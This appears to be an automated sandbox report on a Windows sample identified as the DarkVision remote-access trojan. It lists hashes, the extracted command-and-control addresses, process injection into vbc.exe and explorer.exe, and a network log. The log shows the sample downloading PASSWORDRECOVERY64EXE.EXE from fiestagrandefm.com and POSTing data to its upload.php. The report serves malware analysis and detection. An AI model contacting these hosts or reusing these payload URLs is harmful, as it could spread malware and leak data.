Overview

overview

10

Static

static

3

d5001f3526...b6.exe

windows10-2004-x64

10

Resubmissions

25/11/2024, 20:05 UTC

241125-yts4hatnbw 10

19/11/2024, 09:15 UTC

241119-k7462aykbj 10

Analysis

  • max time kernel
    61s
  • max time network
    61s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25/11/2024, 20:05 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    d5001f35264c4470284bfad49145318d9c68700fe34b7bad8fbdc391500b3eb6.exe

  • Size

    1.1MB

  • MD5

    4c99b8a6627bee05a1de8d9061631551

  • SHA1

    4cb8a13eb146431ee6d45d4b8daab7088e9ae5c2

  • SHA256

    d5001f35264c4470284bfad49145318d9c68700fe34b7bad8fbdc391500b3eb6

  • SHA512

    a17a604f3eda7d04dff453ebe3548b25e43c1fe9f0cd9702a75c20cd87ad16adafb1d3edae8f8c886a1b81173a4fbbdec7d5fd009feb3869701e9cb170756b42

  • SSDEEP

    24576:BftC16YGW3ad7jWpZAgcteeJp5uXirVpVwL03E+g1RRN9wVQ:BfYhwd7jkAgc1BrVrPEtRd

Score
10/10
darkvisionrat

Malware Config

Extracted

Family

darkvision

C2

http://fiestagrandefm.com/ss/upload.php

85.209.133.9

Signatures

  • DarkVision Rat

    DarkVision Rat is a trojan written in C++.

    ratdarkvision
  • Darkvision family
    darkvision
  • Downloads MZ/PE file
  • Uses the VBS compiler for execution 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d5001f35264c4470284bfad49145318d9c68700fe34b7bad8fbdc391500b3eb6.exe
    "C:\Users\Admin\AppData\Local\Temp\d5001f35264c4470284bfad49145318d9c68700fe34b7bad8fbdc391500b3eb6.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:4332
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
      2⤵
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:1180
      • C:\Windows\EXPLORER.EXE
        C:\Windows\EXPLORER.EXE {F34EC6D1-895B-4806-959C-01B8FEAFF719}
        3⤵
          PID:4812

    Network

    • flag-us
      DNS
      240.221.184.93.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      240.221.184.93.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      104.219.191.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      104.219.191.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      71.31.126.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      71.31.126.40.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      95.221.229.192.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      95.221.229.192.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      fiestagrandefm.com
      EXPLORER.EXE
      Remote address:
      8.8.8.8:53
      Request
      fiestagrandefm.com
      IN A
      Response
      fiestagrandefm.com
      IN A
      144.217.96.196
    • flag-ca
      GET
      http://fiestagrandefm.com/ss/PASSWORDRECOVERY64EXE.EXE
      vbc.exe
      Remote address:
      144.217.96.196:80
      Request
      GET /ss/PASSWORDRECOVERY64EXE.EXE HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
      Host: fiestagrandefm.com
      Response
      HTTP/1.1 200 OK
      Date: Mon, 25 Nov 2024 20:05:29 GMT
      Server: Apache
      Last-Modified: Sun, 17 Nov 2024 04:49:50 GMT
      Accept-Ranges: bytes
      Content-Length: 1021952
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: application/x-msdownload
    • flag-us
      DNS
      196.96.217.144.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      196.96.217.144.in-addr.arpa
      IN PTR
      Response
      196.96.217.144.in-addr.arpa
      IN PTR
      r1a1centernet
    • flag-us
      DNS
      9.133.209.85.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      9.133.209.85.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      9.133.209.85.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      9.133.209.85.in-addr.arpa
      IN PTR
    • flag-ca
      POST
      http://fiestagrandefm.com/ss/upload.php
      EXPLORER.EXE
      Remote address:
      144.217.96.196:80
      Request
      POST /ss/upload.php HTTP/1.1
      Connection: Keep-Alive
      Content-Type: multipart/form-data; boundary=part
      Host: fiestagrandefm.com
      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
      Content-Length: 419
      Response
      HTTP/1.1 200 OK
      Date: Mon, 25 Nov 2024 20:05:39 GMT
      Server: Apache
      X-Powered-By: PHP/5.6.40
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Transfer-Encoding: chunked
      Content-Type: text/plain;charset=UTF-8
    • flag-ca
      POST
      http://fiestagrandefm.com/ss/upload.php
      EXPLORER.EXE
      Remote address:
      144.217.96.196:80
      Request
      POST /ss/upload.php HTTP/1.1
      Connection: Keep-Alive
      Content-Type: multipart/form-data; boundary=part
      Host: fiestagrandefm.com
      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
      Content-Length: 414
      Response
      HTTP/1.1 200 OK
      Date: Mon, 25 Nov 2024 20:05:40 GMT
      Server: Apache
      X-Powered-By: PHP/5.6.40
      Keep-Alive: timeout=5, max=99
      Connection: Keep-Alive
      Transfer-Encoding: chunked
      Content-Type: text/plain;charset=UTF-8
    • flag-ca
      POST
      http://fiestagrandefm.com/ss/upload.php
      EXPLORER.EXE
      Remote address:
      144.217.96.196:80
      Request
      POST /ss/upload.php HTTP/1.1
      Connection: Keep-Alive
      Content-Type: multipart/form-data; boundary=part
      Host: fiestagrandefm.com
      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
      Content-Length: 538
      Response
      HTTP/1.1 200 OK
      Date: Mon, 25 Nov 2024 20:05:40 GMT
      Server: Apache
      X-Powered-By: PHP/5.6.40
      Keep-Alive: timeout=5, max=98
      Connection: Keep-Alive
      Transfer-Encoding: chunked
      Content-Type: text/plain;charset=UTF-8
    • flag-ca
      POST
      http://fiestagrandefm.com/ss/upload.php
      EXPLORER.EXE
      Remote address:
      144.217.96.196:80
      Request
      POST /ss/upload.php HTTP/1.1
      Connection: Keep-Alive
      Content-Type: multipart/form-data; boundary=part
      Host: fiestagrandefm.com
      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
      Content-Length: 533
      Response
      HTTP/1.1 200 OK
      Date: Mon, 25 Nov 2024 20:05:40 GMT
      Server: Apache
      X-Powered-By: PHP/5.6.40
      Keep-Alive: timeout=5, max=97
      Connection: Keep-Alive
      Transfer-Encoding: chunked
      Content-Type: text/plain;charset=UTF-8
    • flag-us
      DNS
      56.163.245.4.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      56.163.245.4.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      206.23.85.13.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      206.23.85.13.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      107.12.20.2.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      107.12.20.2.in-addr.arpa
      IN PTR
      Response
      107.12.20.2.in-addr.arpa
      IN PTR
      a2-20-12-107deploystaticakamaitechnologiescom
    • 144.217.96.196:80
      http://fiestagrandefm.com/ss/PASSWORDRECOVERY64EXE.EXE
      http
      vbc.exe
      29.1kB
       1.1MB
       547
      761

      HTTP Request

      GET http://fiestagrandefm.com/ss/PASSWORDRECOVERY64EXE.EXE

      HTTP Response

      200
    • 85.209.133.9:1994
      vbc.exe
      5.8kB
       268 B
       18
      6
    • 144.217.96.196:80
      http://fiestagrandefm.com/ss/upload.php
      http
      EXPLORER.EXE
      4.6kB
       2.0kB
       23
      16

      HTTP Request

      POST http://fiestagrandefm.com/ss/upload.php

      HTTP Response

      200

      HTTP Request

      POST http://fiestagrandefm.com/ss/upload.php

      HTTP Response

      200

      HTTP Request

      POST http://fiestagrandefm.com/ss/upload.php

      HTTP Response

      200

      HTTP Request

      POST http://fiestagrandefm.com/ss/upload.php

      HTTP Response

      200
    • 85.209.133.9:1994
      vbc.exe
      4.3kB
       1.9kB
       47
      43
    • 85.209.133.9:1994
      vbc.exe
      104 B
       2
    • 85.209.133.9:1994
      vbc.exe
      286 B
       140 B
       5
      3
    • 85.209.133.9:1994
      vbc.exe
      286 B
       140 B
       5
      3
    • 85.209.133.9:1994
      vbc.exe
      286 B
       140 B
       5
      3
    • 85.209.133.9:1994
      vbc.exe
      286 B
       140 B
       5
      3
    • 85.209.133.9:1994
      vbc.exe
      338 B
       140 B
       6
      3
    • 8.8.8.8:53
      240.221.184.93.in-addr.arpa
      dns
      73 B
       144 B
       1
      1

      DNS Request

      240.221.184.93.in-addr.arpa

    • 8.8.8.8:53
      104.219.191.52.in-addr.arpa
      dns
      73 B
       147 B
       1
      1

      DNS Request

      104.219.191.52.in-addr.arpa

    • 8.8.8.8:53
      71.31.126.40.in-addr.arpa
      dns
      71 B
       157 B
       1
      1

      DNS Request

      71.31.126.40.in-addr.arpa

    • 8.8.8.8:53
      95.221.229.192.in-addr.arpa
      dns
      73 B
       144 B
       1
      1

      DNS Request

      95.221.229.192.in-addr.arpa

    • 8.8.8.8:53
      fiestagrandefm.com
      dns
      EXPLORER.EXE
      64 B
       80 B
       1
      1

      DNS Request

      fiestagrandefm.com

      DNS Response

      144.217.96.196

    • 8.8.8.8:53
      196.96.217.144.in-addr.arpa
      dns
      73 B
       102 B
       1
      1

      DNS Request

      196.96.217.144.in-addr.arpa

    • 8.8.8.8:53
      9.133.209.85.in-addr.arpa
      dns
      142 B
       131 B
       2
      1

      DNS Request

      9.133.209.85.in-addr.arpa

      DNS Request

      9.133.209.85.in-addr.arpa

    • 8.8.8.8:53
      56.163.245.4.in-addr.arpa
      dns
      71 B
       157 B
       1
      1

      DNS Request

      56.163.245.4.in-addr.arpa

    • 8.8.8.8:53
      206.23.85.13.in-addr.arpa
      dns
      71 B
       145 B
       1
      1

      DNS Request

      206.23.85.13.in-addr.arpa

    • 8.8.8.8:53
      107.12.20.2.in-addr.arpa
      dns
      70 B
       133 B
       1
      1

      DNS Request

      107.12.20.2.in-addr.arpa

    • 8.8.8.8:53

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1180-8-0x0000000140000000-0x000000014007A000-memory.dmp

      Filesize

      488KB

      Download

    • memory/1180-34-0x0000000140000000-0x000000014007A000-memory.dmp

      Filesize

      488KB

      Download

    • memory/1180-33-0x0000000140000000-0x000000014007A000-memory.dmp

      Filesize

      488KB

      Download

    • memory/1180-30-0x0000000140000000-0x000000014007A000-memory.dmp

      Filesize

      488KB

      Download

    • memory/1180-13-0x0000000140000000-0x000000014007A000-memory.dmp

      Filesize

      488KB

      Download

    • memory/1180-14-0x0000000140000000-0x000000014007A000-memory.dmp

      Filesize

      488KB

      Download

    • memory/1180-12-0x0000000140000000-0x000000014007A000-memory.dmp

      Filesize

      488KB

      Download

    • memory/1180-10-0x0000000140000000-0x000000014007A000-memory.dmp

      Filesize

      488KB

      Download

    • memory/4332-5-0x00007FFCC7F00000-0x00007FFCC89C1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4332-7-0x000002643B120000-0x000002643B1D8000-memory.dmp

      Filesize

      736KB

      Download

    • memory/4332-6-0x0000026420400000-0x0000026420414000-memory.dmp

      Filesize

      80KB

      Download

    • memory/4332-0-0x00007FFCC7F03000-0x00007FFCC7F05000-memory.dmp

      Filesize

      8KB

      Download

    • memory/4332-15-0x00007FFCC7F00000-0x00007FFCC89C1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4332-4-0x00007FFCC7F03000-0x00007FFCC7F05000-memory.dmp

      Filesize

      8KB

      Download

    • memory/4332-3-0x00000264203D0000-0x00000264203F6000-memory.dmp

      Filesize

      152KB

      Download

    • memory/4332-2-0x00007FFCC7F00000-0x00007FFCC89C1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4332-1-0x000002641FD20000-0x000002641FE3A000-memory.dmp

      Filesize

      1.1MB

      Download

    • memory/4812-16-0x0000000000EB0000-0x0000000000EB1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/4812-17-0x00000000013D0000-0x00000000014D3000-memory.dmp

      Filesize

      1.0MB

      Download

    • memory/4812-23-0x00000000013D0000-0x00000000014D3000-memory.dmp

      Filesize

      1.0MB

      Download

    • memory/4812-32-0x00000000013D0000-0x00000000014D3000-memory.dmp

      Filesize

      1.0MB

      Download

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.